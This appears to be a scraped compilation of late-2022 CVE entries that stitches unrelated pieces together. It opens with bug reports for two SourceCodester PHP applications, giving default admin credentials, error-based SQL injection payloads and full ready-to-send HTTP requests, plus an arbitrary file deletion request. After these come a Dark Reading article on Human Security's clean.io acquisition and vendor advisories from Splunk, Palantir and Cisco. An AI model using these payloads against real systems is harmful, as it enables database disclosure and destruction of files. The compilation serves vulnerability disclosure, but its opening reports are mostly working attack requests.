Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/classes/Users.php?f=delete_test.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Dig-Bick

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_test

Vulnerability location: /odlms/classes/Users.php?f=delete\_test,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_test HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43051: bug_report/SQLi-1.md at main · 1909900436/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/classes/Users.php?f=delete.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Dig-Bick

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete

Vulnerability location: /odlms/classes/Users.php?f=delete,id

dbname=odlms\_db,length=8

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=6'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43052: bug_report/SQLi-2.md at main · 1909900436/bug_report

Sanitization Management System v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /classes/Master.php?f=delete_img.

**Sanitization Management System v1.0 by oretnom23 has Delete any file**

BUG\_Author: Hujozay

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /php-sms/classes/Master.php?f=delete\_img

Vulnerability location: /php-sms/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shel.php file in the root directory

POST /php\-sms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=system\_info
Content-Length: 71
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fphp-sms%2Fuploads%2Fbanner%2Fshell.php

At present, the shell.php file is still in the directory of the website, when we send a request to delete the shell.php file

The response package shows that the deletion was successful. Let's go to the directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

CVE-2022-43351: bug_report/delete-file-1.md at main · Hujozay/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_inquiry.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hujozay

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_inquiry

Vulnerability location: /php-sms/classes/Master.php?f=delete\_inquiry, id

dbname =sms\_db,length=6

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_inquiry HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43350: bug_report/SQLi-2.md at main · Hujozay/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_quote.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hujozay

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_quote

Vulnerability location: /php-sms/classes/Master.php?f=delete\_quote, id

dbname =sms\_db,length=6

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_quote HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43352: bug_report/SQLi-1.md at main · Hujozay/bug_report

Dark Reading's analysis suggests that Human Security's acquisition of clean.io will significantly expand the company's fraud prevention and anti-malvertising portfolio.

When dealing with a medium as flexible as the Web, it’s impossible for the site owner to fully control what a user sees. The user doesn't need the site's consent to change the user interface or experience through add-ons, custom browser properties, proxies, and firewall settings.

However, certain things are still within the site owner’s control, such as advertiser selection, security, pricing, and content policy. That's the idea behind _site integrity_, that the user or third parties can't try to force a change on the server or the site's backend operations without consent. If someone, or something, can violate site integrity, that is a threat with real business impact.

An example is malvertising, when cybercriminals abuse the programmatic advertising ecosystem to deliver malware to end users via online advertisements. Exposing users to malware is bad enough, but malvertising creates a significant brand reputation problem for the brands and platforms delivering the ads.

How does Human Security's acquisition of clean.io — announced on Thursday for an undisclosed amount — change the market for anti-malvertising technology? Dark Reading's analysis of the two companies suggests that by joining forces, Human Security and clean.io will be able to offer publishers, platforms, and brands a full range of anti-fraud and anti-abuse tools for the advertising ecosystem.

**What's So Great About Clean Humans?**

Safeguarding the advertising ecosystem means ensuring the industry's $500 billion annual ad spend reaches real humans rather than funding criminal schemes. Toward that goal, clean.io employs real-time behavioral protections on the page, as opposed to relying on static creative reviews and pre-scanning techniques offline, according to Human Security. Integrating clean.io's client-side JavaScript behavioral analysis and mitigation to Human Security's Human Defense Platform will make malvertising incredibly costly for bad actors, the company says.

"Human and clean.io have long been strategic partners to help combat two of the most important problems we face in programmatic advertising: malvertising and fraud," Ron Lissack, senior vice president and chief architect at Xandr, said in the release announcing the acquisition. "This type of consolidation in the ecosystem is welcome news and brings with it a true and holistic, 360-degree approach to fighting cybercrime."

**A Solution to the Cart Problem**

Many merchants and retailers rely on coupons to help boost sales (more than 90% of online consumers say they search for and use coupon codes while shopping online), but when those coupons are abused, they have to deal with lost revenue and damaged brand reputation. Between taking the hit on the coupons themselves, having to pay affiliate fees to the coupon app folks, and getting false impressions about the success of certain ad campaigns, coupon fraud is no joke.

Fraud prevention is Human's bread and butter, and Dark Reading's analysis suggests that cart protection is one of the areas that will benefit from the clean.io acquisition. Human Security can expand its concept of site integrity to include fighting checkout fraud and automated coupon and affiliate code replication. By integrating clean.io's cleanCart technology into its BotGuard product, Human Security can expand coverage beyond the detection and elimination of fake leads from the first-party marketing pool.

This combination will eliminate fake affiliates from the pool in some cases, and in others drastically reign in affiliate payouts for out-of-scope automated coupon redemptions.

It's a potent combination; cleanCart was already boasting a 3% conversion rate boost, while claiming to pay for itself entirely within 90 days of purchase. Add BotGuard's improvement to lead quality and conversion rates, and the percentage of fraudulently sourced clients making it through the checkout process should be low.

**Final Analysis**

Human Security is creating a significant pattern of scalable growth through innovation and acquisition. While the recent merger with PerimeterX took them deep into the enterprise e-commerce checkout process, the clean.io acquisition will help stop fraud at its source through its anti-malvertising leadership and bridge the gap, making potential tech partnerships with e-commerce solutions as a whole (Shopify, WooCommerce, et al.) and cart-specific solutions (X-Cart, OpenCart, etc.) even more attractive.

The acquisition of clean.io by Human Security should give a significant boost to the company's real-time fraud detection capabilities and increase its ability to catch novel threats in the wild. The sheer amount of threat intelligence the combined company will have visibility into is another significant product advantage.

"With the clean.io acquisition, the Satori team will gain invaluable talent and threat intelligence. This will help us defend our customers from future attacks and support disruption efforts like 3ve, Methbot, PARETO, and most recently, Scylla," Gavin Reid, vice president of threat intelligence and research at Human Security, said in a statement. "We're looking forward to expanding our investigative power and strengthening our takedown mechanisms to continue safeguarding all of our clients and the industry as a whole."

Human Security Tackles Malvertising With Clean.io Buy

In Splunk Enterprise versions below 8.2.9 and 8.1.12, the way that the ‘tstats command handles Javascript Object Notation (JSON) lets an attacker bypass SPL safeguards for risky commands https://docs.splunk.com/Documentation/SplunkCloud/latest/Security/SPLsafeguards . The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser.

**Advisory ID:** SVD-2022-1105

**Published:** 2022-11-02

**CVSSv3.1 Score:** 8.1, High

**CWE:** CWE-20

**CVE ID:** CVE-2022-43565

**Last Update:** 2022-11-02

**CVSSv3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

**Bug ID:** SPL-224121

**Description**

In Splunk Enterprise versions below 8.2.9 and 8.1.12, the way that the ‘tstats’ command handles Javascript Object Notation (JSON) lets an attacker bypass SPL safeguards for risky commands. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser.   

**Solution**

For Splunk Enterprise, upgrade versions to 8.1.12, 8.2.9, or higher.  

For Splunk Cloud Platform versions below 9.0.2203, Splunk is actively patching and monitoring the Splunk Cloud instances. To request an immediate upgrade, determine which version of Splunk Cloud Platform you're running, then create a new support case.

**Product Status**

Product

Version

Component

Affected Version

Fixed Version

Splunk Enterprise

8.1

Search

8.1.11 and lower

8.1.12

Splunk Enterprise

8.2

Search

8.2.0 to 8.2.8

8.2.9

Splunk Enterprise

9.0

Search

Not Affected

\-

Splunk Cloud Platform

\-

Search

9.0.2202 and lower

9.0.2203

**Mitigations and Workarounds**

The vulnerability affects instances with Splunk Web enabled; disabling Splunk Web is a possible workaround. See Disable unnecessary Splunk Enterprise components and the web.conf configuration specification file for more information on disabling Splunk Web.  

**Detections**

None

**Severity **

Splunk rates the vulnerability as High, 8.1, with a CVSS Vectors of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N.

The vulnerability requires a user interaction within a browser of a privileged user. The vulnerability lets an attacker run risky commands with permissions of a highly privileged user. For more information on risky commands and potential impacts, see SPL safeguards for risky commands. 

If the Splunk Enterprise instance does not run Splunk Web, there is no impact and the severity is Informational.  

Questions? Submit your question to Splunk Support.

CVE-2022-43565: SVD-2022-1105 | Splunk

In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, a View allows for a Reflected Cross Site Scripting via JavaScript Object Notation (JSON) in a query parameter when output_mode=radio.

**Advisory ID:** SVD-2022-1108

**Published:** 2022-11-02

**CVSSv3.1 Score:** 8.8, High

**CWE:** CWE-79

**CVE ID:** CVE-2022-43568

**Last Update:** 2022-11-02

**CVSSv3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**Bug ID:** SPL-228379

**Description**

In Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2, a View allows for a Reflected Cross Site Scripting via JavaScript Object Notation (JSON) in a query parameter when output\_mode=radio.  

**Solution**

For Splunk Enterprise, upgrade versions to 8.1.12, 8.2.9, 9.0.2, or higher.  

For Splunk Cloud Platform versions below 9.0.2205, Splunk is actively patching and monitoring the Splunk Cloud instances. To request an immediate upgrade, determine which version of Splunk Cloud Platform you're running, then create a new support case.

**Product Status**

Product

Version

Component

Affected Version

Fixed Version

Splunk Enterprise

8.1

Splunk Web

8.1.11 and lower

8.1.12

Splunk Enterprise

8.2

Splunk Web  

8.2.0 to 8.2.8

8.2.9

Splunk Enterprise

9.0

Splunk Web  

9.0.0 to 9.0.1

9.0.2

Splunk Cloud Platform

\-

Splunk Web  

9.0.2203.4 and lower

9.0.2205

**Mitigations and Workarounds**

The vulnerability affects instances with Splunk Web enabled, disabling Splunk Web is a possible workaround. See Disable unnecessary Splunk Enterprise components and the web.conf configuration specification file for more information on disabling Splunk Web.  

**Detections**

**Splunk Reflected XSS in the templates lists radio**  

Splunk versions 8.1.0, 8.2.0, and 9.0.0 are vulnerable to reflected cross site scripting (XSS) exploitation leading to Local File Inclusion (LFI) in the Splunk Assist application. This detection search provides information on exploitation attempts.  

**Severity **

Splunk rates the vulnerability as High, 8.8, with a CVSS Vectors of CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. The vulnerability requires user interaction within a browser. If the Splunk Enterprise instance does not run Splunk Web, there is no impact and the severity is Informational.  

**Acknowledgments**

Danylo Dmytriiev (DDV\_UA)

CVE-2022-43568: SVD-2022-1108 | Splunk

The Foundry Blobster service was found to have a cross-site scripting (XSS) vulnerability that could have allowed an attacker with access to Foundry to launch attacks against other users. This vulnerability is resolved in Blobster 3.228.0.

**Security Bulletin**

**Bulletin ID:** PLTRSEC-2022-04

**CVE:** CVE-2022-27894

**Affected Products / Versions:** Foundry Blobster versions 3.207.0 to 3.227.0. Resolved in 3.228.0.

**Publication** **Date:** November 03, 2022

**Summary**

The _**Blobster**_ service was found to have a cross-site scripting (XSS) vulnerability that could have allowed an attacker with access to Foundry to launch attacks against other users. This vulnerability is resolved in Blobster 3.228.0, which has been automatically deployed to all Apollo-managed Foundry instances. As part of maintaining good security hygiene, it is highly recommended that all customers upgrade to the latest version of Blobster.

**Background**

In Palantir Foundry, the Blobster service allows users to upload arbitrary files into the Compass filesystem. This is intentional, supported behavior, as Foundry is designed to ingest and handle highly-customized workflows for customers, and Palantir places content and execution restrictions on these uploads to prevent malicious abuse.

**Details**

On April 22, 2022, it was discovered that the content security policy for the Compass Blobster service was not correctly applying expected process execution restrictions on uploaded files. This introduced a cross-site scripting (XSS) vulnerability, which meant that an authenticated user account could upload a malicious JavaScript file, followed by an HTML file that would load and execute the JavaScript. The attacker could then provide other users with a link to this HTML file and, if the user clicked on the malicious link, execute the JavaScript payload in the context of the target user. This would allow the attacker to perform actions in Foundry as the target user, or to capture the target user's session token.

An investigation was opened and subsequently determined that this vulnerability was introduced on January 21, 2022, as part of a migration in the underlying web framework used by Compass, which changed the headers necessary to apply content restrictions on uploaded data. Palantir Product Development teams developed and deployed modifications to the content security policy that re-enabled execution restrictions on files uploaded to Compass via Blobster.

Our Investigation concluded with no indications of abuse or malicious activity observed across the entirety of our hosted platform.

While we are confident there was no adverse impact to customer environments or data, this misconfiguration does not meet our high bar for security, and we remain committed to providing best in class information security. We have scheduled a root cause analysis for the relevant engineering teams, and a plan of action will be implemented to prevent similar regressions in the future.

**Remediation**

For Foundry infrastructure without Apollo, customers will need to update Blobster to 3.228.0 or greater.

On Palantir-managed Foundry enrollments, the Blobster service has been automatically upgraded to the fully-patched version.

**Palantir Foundry - Customer hosted (without Apollo)**

**Versions:** Foundry Blobster versions 3.207.0 to 3.227.0

**Impact:** A malicious user with access to Blobster can upload files that, when visited, execute Javascript.

**Remediation:**

*   Upgrade to Foundry Blobster version 3.228.0 or greater.

**Palantir Foundry - Palantir Cloud or Apollo-Connected Environments**

**Versions:** Foundry Blobster versions 3.207.0 to 3.227.0

**Impact:** Remediated.

**Remediation:**

*   Palantir Apollo has deployed updated versions of platform services to remediate this issue. No customer action is required.

**Timeline**

2022-01-21: Product Development migrates the Compass Blobster service to a server implementation that did not honor all previously-enforced content security policies.

2022-04-22: A Palantir employee discovers the issue, and files a critical incident notification with the Palantir CIRT.

2022-04-22: Palantir CIRT acknowledges the incident and initiates response procedures.

2022-04-22: As a result of the coordinated investigation, affected products and versions are identified. Foundry Blobster versions 3.207.0 (released January 21, 2022) to 3.227.0 (released April 20, 2022) are impacted with this bug.

2022-04-22: Product Development issues a patch and releases Compass Blobster version 3.228.0. The patch is also backported to Compass Blobster versions 3.185.6, 3.215.4, 3.123.4, and 3.225.1. Palantir's software delivery mechanisms are updated such that vulnerable Foundry Blobster versions can no longer be deployed.

2022-04-22: Customer disclosure of the issue.

2022-04-22: Palantir CIRT begins a manual review and investigation of all uploaded file types in the period of concern.

2022-04-24: Palantir CIRT completes a manual review of the all access to logging systems containing captured session tokens. No indicators of abuse or malicious activity are observed across our hosted platform.

2022-06-10: CVE reserved for issue.

2022-11-03: Public disclosure as per our commitment to transparency.

**Acknowledgement**

This issue was identified internally at Palantir.

CVE-2022-27894: security-bulletins/PLTRSEC-2022-04.md at main · palantir/security-bulletins

A vulnerability in multiple management dashboard pages of Cisco Umbrella could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the Cisco Umbrella dashboard. This vulnerability is due to unsanitized user input. An attacker could exploit this vulnerability by submitting custom JavaScript to the web application and persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information.

**

Summary

**

*   A vulnerability in multiple management dashboard pages of Cisco Umbrella could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the Cisco Umbrella dashboard.
    
    This vulnerability is due to unsanitized user input. An attacker could exploit this vulnerability by submitting custom JavaScript to the web application and persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    This advisory is available at the following link:  
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umbrella-xss-LfeYQV3
    

**

Affected Products

**

*   This vulnerability affects Cisco Umbrella, which is cloud based.
    
    Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability.
    

**

Workarounds

**

*   There are no workarounds that address this vulnerability.
    

**

Fixed Software

**

*   Cisco has addressed this vulnerability in Cisco Umbrella, which is cloud based. No user action is required. Customers can determine the current remediation status or software version by using the Help function in the service GUI.
    
    Customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers to help answer any questions if necessary.
    

**

Exploitation and Public Announcements

**

*   The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
    

**

Source

**

*   Cisco would like to thank Pankaj Kumar Thakur (CISO) of Green Tick Nepal Pvt. Ltd. for reporting this vulnerability.
    

**

Cisco Security Vulnerability Policy

**

*   To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
    

**

Related to This Advisory

**

**

URL

**

**

Revision History

**

*   Version
    
    Description
    
    Section
    
    Status
    
    Date
    
    1.0
    
    Initial public release.
    
    \-
    
    Final
    
    2022-NOV-02
    
    Show Less
    

**

Legal Disclaimer

**

*   THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
    
    A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
    

**

Feedback

**

Tag

#java